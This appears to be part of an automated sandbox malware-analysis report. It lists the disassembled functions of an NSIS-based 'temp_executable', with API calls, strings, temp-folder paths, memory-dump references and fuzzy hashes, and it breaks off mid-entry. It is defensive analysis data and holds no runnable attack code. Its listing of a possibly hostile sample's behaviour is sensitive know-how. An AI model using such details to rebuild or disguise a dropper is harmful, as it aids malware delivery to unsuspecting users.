                                • Instruction ID: ac3c7827115ee855a696472e6a70c5e4fb7cac6e51cf912ccc90d208c1262af9
                                • Opcode Fuzzy Hash: abf7321ecfe745b46f7b8ea960bd9c265c0882f09d776aa47d2a89f6dad764dc
                                • Instruction Fuzzy Hash: 7B21F571A056206BD310AF55AC84A9BBBDCEF94350F44443FF548A3291C7B89D008AAD
                                Function 004056B5 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45windowCOMMON
                                Download Yara Rule
                                APIs
                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004056CE
                                • GetMessagePos.USER32 ref: 004056D6
                                • ScreenToClient.USER32(?,?), ref: 004056F0
                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00405704
                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 0040572C
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Message$Send$ClientScreen
                                • String ID: f
                                • API String ID: 41195575-1993550816
                                • Opcode ID: c033d2a482c0bbee4868c7629423a8e69750951f4e6b473a84ec653bd2017e87
                                • Instruction ID: 0216f53b5c1e39ec49102949a755e2bc9d8ef7e3372eb4174345f74bd41e4177
                                • Opcode Fuzzy Hash: c033d2a482c0bbee4868c7629423a8e69750951f4e6b473a84ec653bd2017e87
                                • Instruction Fuzzy Hash: C3014C7194020DBBEB01AF94CD45BEEBBB9EF44710F10412AFA50BA1E0C7B49A41DF54
                                Function 00401FB8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON
                                Download Yara Rule
                                APIs
                                • GetDC.USER32 ref: 00401FB9
                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401FD0
                                • MulDiv.KERNEL32(00000000,00000000), ref: 00401FD8
                                • ReleaseDC.USER32(?,00000000), ref: 00401FEB
                                  • Part of subcall function 00405E95: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,00424200,?,00000000,?,?,?,00000000,?,?), ref: 0040604B
                                • CreateFontIndirectW.GDI32(0040C8C8), ref: 00402037
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: CapsCreateDeviceFontIndirectReleaselstrcat
                                • String ID: Times New Roman
                                • API String ID: 4253744674-927190056
                                • Opcode ID: 9f2a315a86747fca2e42ee02dfd95963893f875b0ab85644b2b496c98eb1a616
                                • Instruction ID: a293f1e503c12f3834b95d63be9809c732b55947eac1385e5f26d009a2b4f9be
                                • Opcode Fuzzy Hash: 9f2a315a86747fca2e42ee02dfd95963893f875b0ab85644b2b496c98eb1a616
                                • Instruction Fuzzy Hash: 5401D473144780EFD300BBB49E8AA563BE8EB55706F10893EF685B71E1C9784109CB2D
                                Function 0040362A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38timeCOMMON
                                Download Yara Rule
                                APIs
                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00403648
                                • MulDiv.KERNEL32(000CAC30,00000064,000CAC30), ref: 00403670
                                • wsprintfW.USER32 ref: 00403680
                                • SetWindowTextW.USER32(?,?), ref: 00403690
                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 004036A2
                                Strings
                                • verifying installer: %d%%, xrefs: 0040367A
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Text$ItemTimerWindowwsprintf
                                • String ID: verifying installer: %d%%
                                • API String ID: 1451636040-82062127
                                • Opcode ID: 047d2cc0e248829387beeb5a8e07bbe74402e6ee51346e78a70c3337b09d8a04
                                • Instruction ID: 23416ea20b8bc991085432565deaec88b6a19029d37e317e26b4fa0cf66bde53
                                • Opcode Fuzzy Hash: 047d2cc0e248829387beeb5a8e07bbe74402e6ee51346e78a70c3337b09d8a04
                                • Instruction Fuzzy Hash: F7016D71540208FBEF24AFA0DE86FAA3B69AB04305F00853EF646B51E0DBB99554CF5D
                                Function 6FC32209 Relevance: 9.1, APIs: 6, Instructions: 101COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 6FC312F8: GlobalAlloc.KERNELBASE(00000040,?,6FC311C4,-000000A0), ref: 6FC31302
                                • GlobalFree.KERNEL32(00000000), ref: 6FC322F1
                                • GlobalFree.KERNEL32(00000000), ref: 6FC32326
                                Memory Dump Source
                                • Source File: 00000002.00000002.20001269089.000000006FC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6FC30000, based on PE: true
                                • Associated: 00000002.00000002.20001233361.000000006FC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000002.00000002.20001307380.000000006FC34000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000002.00000002.20001344547.000000006FC36000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_6fc30000_temp_executable.jbxd
                                Similarity
                                • API ID: Global$Free$Alloc
                                • String ID:
                                • API String ID: 1780285237-0
                                • Opcode ID: 7b426cd6570a019916629c52efccb480e0c46297f702d7411f8f11a63442bb18
                                • Instruction ID: fd9b8fd9d2c0dc81b8dc0e2923542f6150261dda9c30724719930924a0cc2021
                                • Opcode Fuzzy Hash: 7b426cd6570a019916629c52efccb480e0c46297f702d7411f8f11a63442bb18
                                • Instruction Fuzzy Hash: 9431E433A04622DFDF258F69CD64EAA77B9FF863A5B000569F601C6190E7339464CBE0
                                Function 6FC310C7 Relevance: 8.9, APIs: 7, Instructions: 162memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GlobalAlloc.KERNEL32(00000040,?), ref: 6FC3116B
                                • GlobalFree.KERNEL32(00000000), ref: 6FC311AE
                                • GlobalFree.KERNEL32(00000000), ref: 6FC311CD
                                • GlobalAlloc.KERNEL32(00000040,?), ref: 6FC311E6
                                • GlobalFree.KERNEL32 ref: 6FC3125C
                                • GlobalFree.KERNEL32(?), ref: 6FC312A7
                                • GlobalFree.KERNEL32(00000000), ref: 6FC312BF
                                Memory Dump Source
                                • Source File: 00000002.00000002.20001269089.000000006FC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6FC30000, based on PE: true
                                • Associated: 00000002.00000002.20001233361.000000006FC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000002.00000002.20001307380.000000006FC34000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000002.00000002.20001344547.000000006FC36000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_6fc30000_temp_executable.jbxd
                                Similarity
                                • API ID: Global$Free$Alloc
                                • String ID:
                                • API String ID: 1780285237-0
                                • Opcode ID: ebefbb6a343c2502287e22e55665f98bb3f3fdaa7f1ca8f3b0dfa70ff1c0253d
                                • Instruction ID: 70b20797b23721dc8be0cc63d8d08b99e42d757b397979e6e685c84a6beb5260
                                • Opcode Fuzzy Hash: ebefbb6a343c2502287e22e55665f98bb3f3fdaa7f1ca8f3b0dfa70ff1c0253d
                                • Instruction Fuzzy Hash: 04518077E007229FCB20CF6DC980A6A77F4FF4A394B00492AEA45D7250E736E915CB91
                                Function 6FC32049 Relevance: 7.6, APIs: 5, Instructions: 129memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GlobalFree.KERNEL32(00000000), ref: 6FC321BF
                                  • Part of subcall function 6FC312E1: lstrcpynW.KERNEL32(00000000,?,6FC3156A,?,6FC311C4,-000000A0), ref: 6FC312F1
                                • GlobalAlloc.KERNEL32(00000040), ref: 6FC3212C
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6FC3214C
                                Memory Dump Source
                                • Source File: 00000002.00000002.20001269089.000000006FC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6FC30000, based on PE: true
                                • Associated: 00000002.00000002.20001233361.000000006FC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000002.00000002.20001307380.000000006FC34000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000002.00000002.20001344547.000000006FC36000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_6fc30000_temp_executable.jbxd
                                Similarity
                                • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                • String ID:
                                • API String ID: 4216380887-0
                                • Opcode ID: 92e1fde204657cc7566e59c786db025e89232e2a9abec962dfef11d09d6291b0
                                • Instruction ID: dbd967a39b47cf024701162afdf7449ab04ad02ccd850dcad13909bbe0ce6983
                                • Opcode Fuzzy Hash: 92e1fde204657cc7566e59c786db025e89232e2a9abec962dfef11d09d6291b0
                                • Instruction Fuzzy Hash: C1412773D05726EFCB149F28CA54AE977B8FB063D0B40023EEA48DA144F7716954CAE0
                                Function 00401EEA Relevance: 7.6, APIs: 5, Instructions: 74windowCOMMON
                                Download Yara Rule
                                APIs
                                • GetDlgItem.USER32(?,?), ref: 00401F03
                                • GetClientRect.USER32(00000000,?), ref: 00401F4D
                                • LoadImageW.USER32(00000000,?,00000100,?,?,00000100), ref: 00401F82
                                • SendMessageW.USER32(00000000,00000172,00000100,00000000), ref: 00401F92
                                • DeleteObject.GDI32(00000000), ref: 00401FA1
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                • String ID:
                                • API String ID: 1849352358-0
                                • Opcode ID: 7f9423f384d93fc0e3e6fbc7cac958838f77b0a9d1a07732a5146b80b1a3c62d
                                • Instruction ID: a1357e6e01c620789306e575287b66343fc6a42a857d7aaea03cc6a10a526d0d
                                • Opcode Fuzzy Hash: 7f9423f384d93fc0e3e6fbc7cac958838f77b0a9d1a07732a5146b80b1a3c62d
                                • Instruction Fuzzy Hash: 1C21B6726093029FD340DF64DE84A6BB7E8EB88304F04093EF985E62A1D778D840DB59
                                Function 6FC31F7B Relevance: 7.5, APIs: 5, Instructions: 38memorylibraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000808,00000000,6FC32B4C,00000000,00000808), ref: 6FC31F8C
                                • GlobalAlloc.KERNEL32(00000040,00000000), ref: 6FC31F97
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6FC31FAB
                                • GetProcAddress.KERNEL32(?,00000000), ref: 6FC31FB6
                                • GlobalFree.KERNEL32(00000000), ref: 6FC31FBF
                                Memory Dump Source
                                • Source File: 00000002.00000002.20001269089.000000006FC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6FC30000, based on PE: true
                                • Associated: 00000002.00000002.20001233361.000000006FC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000002.00000002.20001307380.000000006FC34000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000002.00000002.20001344547.000000006FC36000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_6fc30000_temp_executable.jbxd
                                Similarity
                                • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                • String ID:
                                • API String ID: 1148316912-0
                                • Opcode ID: ef712a2423256fb01bb0461b7c77f082ba2ddbb04054309ace3c51f7cecdb2e6
                                • Instruction ID: d9ac6cc4d7fdc0a6fefb43e28a0fab36886da1966a9082666a362b19cda00f7b
                                • Opcode Fuzzy Hash: ef712a2423256fb01bb0461b7c77f082ba2ddbb04054309ace3c51f7cecdb2e6
                                • Instruction Fuzzy Hash: DAF0C033208519BBCA201AE7DC0CD97BE7DFB8B6FAB160215F719D11A0C56368108771
                                Function 0040553B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlenW.KERNEL32(004211D0,%u.%u%s%s,?,00000000,00000000,?,000000DC,00000000,?,000000DF,004211D0,?,?,?,?,?), ref: 004055FA
                                • wsprintfW.USER32 ref: 00405607
                                • SetDlgItemTextW.USER32(?,004211D0), ref: 0040561E
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: ItemTextlstrlenwsprintf
                                • String ID: %u.%u%s%s
                                • API String ID: 3540041739-3551169577
                                • Opcode ID: 1657763a395a501c771c527054f82eb2be7fb15598214c574ca57117f0c03a97
                                • Instruction ID: 55cf9957bdbe08eeb8051450228c2b429c3200e40720c4f5a9b0f695fa8f14cf
                                • Opcode Fuzzy Hash: 1657763a395a501c771c527054f82eb2be7fb15598214c574ca57117f0c03a97
                                • Instruction Fuzzy Hash: 902106737003142FD720A9799C81FAB7289CBC5364F01473EFE6AF71D1E979581885A5
                                Function 00401DBA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                Download Yara Rule
                                APIs
                                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,?,?,?), ref: 00401E2C
                                • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00401E48
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: MessageSend$Timeout
                                • String ID: !
                                • API String ID: 1777923405-2657877971
                                • Opcode ID: 717c05464dbdde1d43877d7e05f7376ad78b7270f4b2221d83dfb1c24934849a
                                • Instruction ID: 49af8de353e46cf11236f791407a5cbcba9ae5af57995df827a2b81b7b260957
                                • Opcode Fuzzy Hash: 717c05464dbdde1d43877d7e05f7376ad78b7270f4b2221d83dfb1c24934849a
                                • Instruction Fuzzy Hash: 44212471209301AFE714AF21C846A2FBBE8EF84755F00093FF585A21E0C6B98D01CA5A
                                Function 6FC31F1E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28stringCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfW.USER32 ref: 6FC31F51
                                • lstrcpyW.KERNEL32(?,error,00001018,6FC31765,00000000,?), ref: 6FC31F71
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.20001269089.000000006FC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6FC30000, based on PE: true
                                • Associated: 00000002.00000002.20001233361.000000006FC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000002.00000002.20001307380.000000006FC34000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000002.00000002.20001344547.000000006FC36000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_6fc30000_temp_executable.jbxd
                                Similarity
                                • API ID: lstrcpywsprintf
                                • String ID: callback%d$error
                                • API String ID: 2408954437-1307476583
                                • Opcode ID: 8f683150b883aa23e48894f463d90198684e0149c8f81b6ddfc0e009bda34a50
                                • Instruction ID: 5ed1d06a84ed2bc492cc0ad4c1f9e85869cc7e836f9621b2fa861347f44ed627
                                • Opcode Fuzzy Hash: 8f683150b883aa23e48894f463d90198684e0149c8f81b6ddfc0e009bda34a50
                                • Instruction Fuzzy Hash: 96F01C36B04120AFD7088B08D948DBA73A5FF8A390F0585A8F9599B211D775EC548B95
                                Function 00406531 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403C9E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76073420,0040399D), ref: 00406537
                                • CharPrevW.USER32(?,00000000), ref: 00406542
                                • lstrcatW.KERNEL32(?,004082B0), ref: 00406554
                                Strings
                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00406531
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: CharPrevlstrcatlstrlen
                                • String ID: C:\Users\user\AppData\Local\Temp\
                                • API String ID: 2659869361-3355392842
                                • Opcode ID: d05188d841616a9e1b7d59f18f8490afccaafd82e288364c4b54bb9922993767
                                • Instruction ID: cc5554a2ad12a3b2ce5c355aa705355a4eb5105ff62047e1dcc734cc64aad723
                                • Opcode Fuzzy Hash: d05188d841616a9e1b7d59f18f8490afccaafd82e288364c4b54bb9922993767
                                • Instruction Fuzzy Hash: B6D05E31102924AFC2026B58AE08D9B77ACFF46301301406EFAC2B3160CB745D5287ED
                                Function 0040285F Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 70stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsfA9D2.tmp\System.dll), ref: 004028B9
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: lstrlen
                                • String ID: C:\Users\user\AppData\Local\Temp\nsfA9D2.tmp$C:\Users\user\AppData\Local\Temp\nsfA9D2.tmp\System.dll
                                • API String ID: 1659193697-1643209395
                                • Opcode ID: 8dbcb2fd7b217228523bb32d9577dfde9e670be5aaf231835310540875a17a73
                                • Instruction ID: 87e4a89a1644b821f0af8cb1a7976e90618d12837afc66c1e862d8435416238a
                                • Opcode Fuzzy Hash: 8dbcb2fd7b217228523bb32d9577dfde9e670be5aaf231835310540875a17a73
                                • Instruction Fuzzy Hash: C7112676A543006BD310BB618A89A2BB7D4AF84314F11453FF545B31C1D7BC980687AF
                                Function 00402077 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 54COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00405D15: lstrlenW.KERNEL32(00424200,?,00000000,?,?), ref: 00405D47
                                  • Part of subcall function 00405D15: lstrlenW.KERNEL32(?,00424200,?,00000000,?,?), ref: 00405D59
                                  • Part of subcall function 00405D15: lstrcatW.KERNEL32(00424200,?,?,00424200,?,00000000,?,?), ref: 00405D74
                                  • Part of subcall function 00405D15: SetWindowTextW.USER32(00424200,00424200), ref: 00405D8C
                                  • Part of subcall function 00405D15: SendMessageW.USER32(00000000), ref: 00405DB3
                                  • Part of subcall function 00405D15: SendMessageW.USER32(00000000,0000104D,00000000,?), ref: 00405DCE
                                  • Part of subcall function 00405D15: SendMessageW.USER32(00000000,00001013,00000000,00000000), ref: 00405DDB
                                  • Part of subcall function 004069CE: ShellExecuteExW.SHELL32(?), ref: 004069DD
                                  • Part of subcall function 004064EF: WaitForSingleObject.KERNEL32(?,00000064), ref: 004064F9
                                  • Part of subcall function 004064EF: GetExitCodeProcess.KERNEL32(?,?), ref: 00406523
                                • CloseHandle.KERNEL32(?,?), ref: 00402110
                                Strings
                                • C:\Users\user\AppData\Local\Temp\nsfA9D2.tmp\System.dll, xrefs: 00402098
                                • @, xrefs: 004020F2
                                • C:\Users\user\AppData\Local\Temp\identitetsproblemer\Mercerising\Trichoschistic, xrefs: 004020D1
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
